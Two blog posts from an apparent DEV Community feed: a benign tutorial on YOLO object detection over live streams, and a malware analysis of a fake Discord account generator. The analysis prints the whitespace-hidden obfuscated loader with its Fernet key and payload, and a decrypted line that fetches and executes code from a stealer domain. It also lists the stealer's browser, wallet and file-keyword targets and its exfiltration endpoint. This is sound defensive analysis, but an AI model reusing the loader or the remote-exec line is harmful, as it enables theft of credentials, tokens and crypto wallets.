DEV Community: Spring-0

Building Real-time Object Detection on Live-streams

Spring-0 — Sat, 30 Nov 2024 03:14:53 +0000

Artificial Intelligence (AI), or more specifically object detection is a fascinating topic that opens a gateway to a wide variety of projects and ideas. I recently came across an YOLO (You Only Look Once) implementation from Ultralytics, which is an fast, accurate, and super easy to implement object detection model. In this post I will walk you through my process of building real-time object detection on live streams.

I have built this to work on RTSP (Real-time streaming protocol) and HLS (HTTP Live Streaming).

What Makes YOLO Special?

For starters, YOLO is super fast and excels with real time object detection due to the way it works internally which is very different from other models such as R-CNN.

Algorithms like Faster R-CNN use Region Proposal Network to detect regions of interest, then performs detection on those regions over multiple iterations. While YOLO does it in a single iteration, hence the name "You Only Look Once".

In addition, YOLO requires very little training data because the first 20 convolution layers have been pre-trained on the ImageNet dataset.

Now The Project!

Now that all the terminology is out of the way, I can dive into how I set up real-time object detection using YOLO.

First step is to install the required dependencies:

torch (only needed if you plan on utilizing GPU for training)
opencv-python for video processing
ultralytics for the YOLO model

Since I have a Nvidia graphics card I utilized CUDA to train on my GPU (which is much faster).

First we load the YOLO model, I used YOLOv11 trained on the COCO (Common Objects in Context) dataset.

model = YOLO(r"C:\path\to\your\yolo_model.pt")

Next, we capture the stream using opencv-python, read each frame within a loop, and run that frame through our YOLO model - very straight forward.

video_cap = cv2.VideoCapture(STREAM_URL)
cv2.namedWindow("Detection Output", cv2.WINDOW_NORMAL)

while True:
    ret, frame = video_cap.read() # read the frame from the capture
    if not ret:
        break

    results = model(frame) # get prediction on frame from YOLO model

    cv2.imshow("Detection Output", frame) # Draw the frame

    if cv2.waitKey(1) == ord("q"): # Quit on "q" key press.
        break

# Don't forget to quit gracefully!
video_cap.release()
cv2.destroyAllWindows()

That easy, now this will give you the predictions in your terminal, but what if you want to draw your bounding boxes for example?

results = model(frame) - results represents a list of predictions YOLO has made, and each of these predictions have additional data; such as bounding box coordinates, confidence, and labels.

With this you can loop through the results list, and draw whatever data you want to display from the predictions to your frame.

Here is an example where I drew bounding boxes around the predictions:

    for box in results[0].boxes.xywh.tolist():
        center_x, center_y, width, height = box
        x1 = int(center_x - width / 2)  # top left x
        y1 = int(center_y - height / 2)  # top left y
        x2 = int(center_x + width / 2)  # bottom right x
        y2 = int(center_y + height / 2)  # bottom right y

        # rectangle parameters: frame, point1, point2, BGR color, thickness
        cv2.rectangle(frame, (x1, y1), (x2, y2), (255, 0, 0), 2)

You can find the full code on my GitHub here.

Demo

For this demo, I used yt-dlp to get the direct stream URL from a YouTube livestream like so:

yt-dlp -g https://www.youtube.com/watch?v=VIDEO_ID

With the following detection classes:

person
bicycle
car
motorcycle
bus
truck
cat
dog
sports ball

I purposely omitted labels and confidence scores to reduce clutter

And that's that. Thanks for Reading :)

🌱

Exposing the Deception: Discord Account Generator with Hidden Malware

Spring-0 — Sun, 09 Jun 2024 06:11:27 +0000

The Discord community has become a haven for malicious actors, whether it is through utilizing Discord's CDN server to spread malicious files with a trusted link, using Discord servers as C2 servers, and more.

More specifically, in this post I will be investigating one of many malicious "discord token generators" on the market, lets get started.

The software is advertised on GitHub as a open source project here.

If you head to the project description, you will see something quite weird. Open source a non-functional version of the project and advertise a paid version in that very same repository?

The shop is powered by sell.app so the website itself does not seem malicious.

Now lets investigate the paid version download.

The download consists of a "genSetup.zip" file containing the following:

config.toml: Empty configuration file, maybe it gets generated? (Hint: no it doesn't)
key.txt: Seems like where the user is meant to enter their key. I am presuming one is given after making the purchase.
requirements.txt: Consists of valid libraries that are required for this type of project.
start.bat: Simply runs the python file, nothing special there.

Opening main.py we see the following (notice the imports)

After reviewing the rest of the code it is identical to the version the actor uploaded to GitHub. There does not seem to be any malicious code, well at least not malicious to the user. Discord says otherwise.

So where is this malicious code? We were given a non obfuscated python file.

You may have already noticed in the initial code screenshot, but the horizontal scrollbar informs us that there is much more content to see. And turns out the malicious code was on the very first line just padded with a bunch of white spacing.

Here is the revised code of the first few lines with the white spacing removed.

import requests   ;import os;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk=').decrypt(b'gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU=')) # type: ignore

A sneaky one liner. Now we can begin examining the payload.

Firstly it installs the following libraries:
These libraries were not listed in the provided "requirements.txt" file.

cryptography
fernet
requests

The # type: ignore is used to hide type errors.

We can clearly see that some encrypted code is being executed through the exec() function call.

Lucky for us, the fernet encryption key is right there in the code!

If the encryption key is provided in the source code, what is the point of encrypting the payload?
This is an evasive technique used to evade any signature based malware scanners.

Using the following code I wrote, I was able to see the decrypted code.

key = "NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk="
message = "gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU="

fernet = Fernet(key)
decrypted_message = fernet.decrypt(message)
print(decrypted_message.decode())

And this is the output:

exec(requests.get('https://1312stealer.ru/paste?userid=1000000000').text.replace('<pre>','').replace('</pre>',''))

Yet another exec() function call, with the content from a website with the domain 1312stealer. Not very subtle now.

Anyways, lets see this what is being executed.

Installing fernet again? And this time with a different system execution command? Looks to me that someone has been using ctrl+c & ctrl+v too much 😂

Lets break this down.
The code is creating a file named "gruppe.py" in the APPDATA directory and writing code into it and finally executes it.

Judging by the length of the encrypted payload (trimmed in the screenshot above) it looks like the final payload.

Lets decrypt it using the same method used previously and see exactly what this malware is doing.

There is a targeted list of browsers, browser extensions, wallets, directories to search, file keywords, file extensions, and discord token paths.

Here are the specific targets:

Browsers

Google Chrome
Microsoft Edge
Opera
Opera GX
Brave
Yandex
Firefox

Browser Extensions

Authenticator
Binance
Bitapp
BoltX
Coin98
Coinbase
Core
Crocobit
Equal
Ever
ExodusWeb3
Fewcha
Finnie
Guarda
Guild
HarmonyOutdated
Iconex
Jaxx
Kaikas
KardiaChain
Keplr
Liquality
MEWCX
MaiarDEFI
Martian
Math
Metamask
Metamask2
Mobox
Nami
Nifty
Oxygen
PaliWallet
Petra
Phantom
Pontem
Ronin
Safepal
Saturn
Slope
Solfare
Sollet
Starcoin
Swash
TempleTezos
TerraStation
Tokenpocket
Ton
Tron
Trust Wallet
Wombat
XDEFI
XMR.PT
XinPay
Yoroi
iWallet

Wallets

Atomic
Exodus
Electrum
Electrum-LTC
Zcash
Armory
Bytecoin
Jaxx
Etherium
Guarda
Coinomi

Target Paths

Desktop
Documents
Downloads
OneDrive\Documents
OneDrive\Desktop

File Keywords

passw
mdp
mot_de_passe
login
secret
account
acount
paypal
banque
metamask
wallet
crypto
exodus
discord
2fa
code
memo
compte
token
backup
seecret

Now let's further investigate into how they are being targeted.

Firstly, passwords and cookies are being retrieved from the browser and saved to "APPDATA\gruppe_storage". This storage folder is used to store all the details extracted from the victim's machine.

The passwords that are being retrieved are the ones that you choose to save (That popup that asks you to save password whenever you register to a site).

Browser extension folders are simply being zipped up whole, no specific data is being extracted from them.

Using regular expression, discord tokens are being retrieved from the local discord files. Along with tokens, discord connected data including phone numbers, emails, display name, user id are also being retrieved.

In case you are not aware, having access to an individual's discord token allows you to authenticate as them regardless of two factor authentication.

Files located in the Desktop or Documents directories are being filtered based on the target keywords and file extensions listed above.

Similar to browser extensions, wallet paths are also being zipped up whole.

Specific to the Atomic and Exodus wallets, malicious code retrieved from https://1312stealer.ru/wallet and https://1312stealer.ru/wallet/atomic are being written to the wallet directories which injects into the wallets capturing mnemonics and passwords.

Ten times. It calls the inject function 10 times. I guess they really want that in there 😂

Well now all that data is sitting in APPDATA\grouppe_storage, how do they get their hands on this data?

We can see that each file in grouppe_storage being passed as a parameter to the upload_to_server() function.

Here we can see the final location this data is being sent to: 1312stealer.ru/delivery

Again being called 10 times. Maybe 10 is their lucky number 🤷

Thanks for reading :)

🌱